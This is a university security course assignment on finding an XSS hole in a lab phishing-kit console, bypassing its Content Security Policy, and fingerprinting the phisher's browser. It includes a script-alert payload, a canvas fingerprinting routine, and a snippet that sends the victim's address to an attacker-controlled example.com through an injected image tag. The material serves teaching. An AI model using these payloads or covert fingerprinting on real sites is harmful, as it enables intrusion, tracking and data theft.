Cross-Site Scripting

In this assignment, you will:

  1. Find an XSS vulnerability in a NU phishing kit console
  2. Gain code execution on the console page
  3. Exfiltrate the phisher’s IP address

Phishing Kit

You have obtained access to a copy of a phishing kit targeting Northeastern single sign on credentials for students, staff, and faculty. This kit is available in Canvas as a container called xss_00.img.xz or as bare source code in xss.tgz.

Your goal for this assignment is to uncover the identity of the phisher by identifying an injection vulnerability in the kit, gaining code execution in the console, and exfiltrating the phisher’s IP address. You can assume that the public instance is identical to the copy you have except for the value of app.secret_key.

Code Execution

Obtaining code execution will require identifying an XSS vulnerability in the phishing console. What is the attack surface available to you? What data presented in the console do you control?

The classic proof-of-concept payload to demonstrate code execution is to create an alert dialog box:

<script>alert("hi");</script>

Try to inject this PoC. Did it work?

Unless you are using an ancient browser, the PoC will have failed due to the presence of a Content Security Policy. Examine the policy presented by the phishing kit. Find a way to bypass the policy to gain code execution.

Attribution

With the ability to execute code with the privileges of the phishing kit origin, it’s time to move beyond a simple alert dialog. To attribute the attacker, you will start by obtaining their IP address and transmitting it to an endpoint you control.

Search for a way to obtain the phisher’s IP address using injected JavaScript.

Extended Attribution

While IP addresses are useful information, in reality they are not considered equivalent to personal identity from a legal perspective (see, e.g., VPR v. DOES 1–1017).[1] This is in part because IP address assignments change over time, especially for consumer ISP subscribers whose dynamic IP leases, obtained over DHCP, must be renewed every so often. One could also argue for this result based on the prevalence of malware-infected hosts and of endpoints shared by multiple people.

Fortunately, browsers provide a rich amount of identifying information that allows one to create (virtually) unique fingerprints. A number of techniques exist to compute these fingerprints, and their use has increased in popularity for several purposes. Fraud or bot detection systems often rely on browser fingerprints, as well as some forms of CAPTCHA. Fingerprinting has also become more popular in the ad tech world in response to growing privacy protections rendering other tracking mechanisms less effective than in the past.

One of the most well-known techniques is called canvas fingerprinting, and relies on variance in browser implementations of the HTML5 canvas element. Here, code draws a mix of text and images to a canvas, renders this to an image, and then computes a hash of the image pixel data.
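As an added example (not part of the assignment or the kit), the two halves of a canvas fingerprint in JavaScript: a pure hash over raw RGBA pixel bytes, and a browser-only routine that draws a fixed scene with the standard 2D canvas API and hashes the read-back pixel buffer. The scene text and layout are assumptions chosen to exercise font rasterisation and antialiasing.

```javascript
// Added example: canvas fingerprint = fixed drawing + hash of pixel data.

// 32-bit FNV-1a over a byte array, returned as 8 hex digits. Any byte-level
// difference in how the scene was rasterised changes the digest.
function hashPixels(bytes) {
  let h = 0x811c9dc5;
  for (let i = 0; i < bytes.length; i++) {
    h ^= bytes[i];
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h.toString(16).padStart(8, "0");
}

// Draw text in two fonts, an emoji and a translucent overlay, then hash the
// RGBA buffer. Returns null when no DOM is available (e.g. under Node).
function drawCanvasFingerprint() {
  if (typeof document === "undefined") return null;
  const canvas = document.createElement("canvas");
  canvas.width = 240;
  canvas.height = 60;
  const ctx = canvas.getContext("2d");
  ctx.textBaseline = "top";
  ctx.font = "14px Arial";
  ctx.fillStyle = "#f60";
  ctx.fillRect(100, 5, 80, 30);
  ctx.fillStyle = "#069";
  ctx.fillText("Cwm fjordbank glyphs vext quiz \u{1F600}", 2, 15);
  ctx.font = "18px serif";
  ctx.fillStyle = "rgba(102, 204, 0, 0.7)";
  ctx.fillText("Cwm fjordbank glyphs vext quiz", 4, 35);
  const { data } = ctx.getImageData(0, 0, canvas.width, canvas.height);
  return hashPixels(data);
}
```

The digest is only as stable as the rendering stack beneath it: the same browser with a different GPU driver, font set or zoom level can produce a different value, so a fingerprint built from this alone should be combined with other signals rather than treated as an identity.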

WebGL fingerprinting adopts the same approach as canvas fingerprinting, but draws into a WebGL rendering context instead of a 2D canvas context, so that differences in the GPU, driver and shader compiler also affect the result.

Numerous other techniques exist, such as:

  • device enumeration
  • audio fingerprinting
  • extension fingerprinting
  • display fingerprinting

Use one or more techniques to derive a fingerprinting algorithm that is independent of IP address. In the interests of stealth, executing the algorithm must not result in observable side effects to the phisher.

Exfiltration

With the identifying information in hand, let’s turn to exfiltration. The traditional method to perform a cross-origin exfiltration is to add an HTML tag to the document that causes a resource load, since the same-origin policy does not restrict such loads. For instance, assuming that the attacker controls example.com:

// Encode the value so it survives as a single query parameter.
const url = "https://example.com/?address=" + encodeURIComponent(address);
const tag = "<img src='" + url + "'>";
// Writing the tag (not the bare URL) into the document triggers the resource load.
document.write(tag);

Try injecting a payload along these lines. Did it work?

Again, unless you’re using an ancient browser, the payload will have failed due to the kit’s CSP. Re-examine the policy, and find a way to bypass it.

Unmasking the Phisher

Once you have a fully-working attack, execute it against the “real” instance at http://neuidmsso.nëu.lol/idp/profile/SAML2/POST/SSO.

Each group’s instance is hosted on a separate port. For the port, add your group number to 18759.

For the purposes of greater realism, visits by the phisher will be intermittent and irregular. Also, the console will not be reset, so do not attack it until you have a reliable end-to-end attack working on your local copy!

Submission Instructions

  1. Upload a tgz archive to Canvas containing the following files:
    • A README.md describing what your attack does and the identity of the phisher
    • The source code for your attack
  2. Extra credit. Include in your submission an HTML file called fingerprint.html. When loaded in a modern browser, it should display an obvious message indicating whether the page is loaded in the phisher’s browser or not. It will be tested against a range of browsers.

  [1] But, in some cases an IP address is considered PII.


© 2022 wkr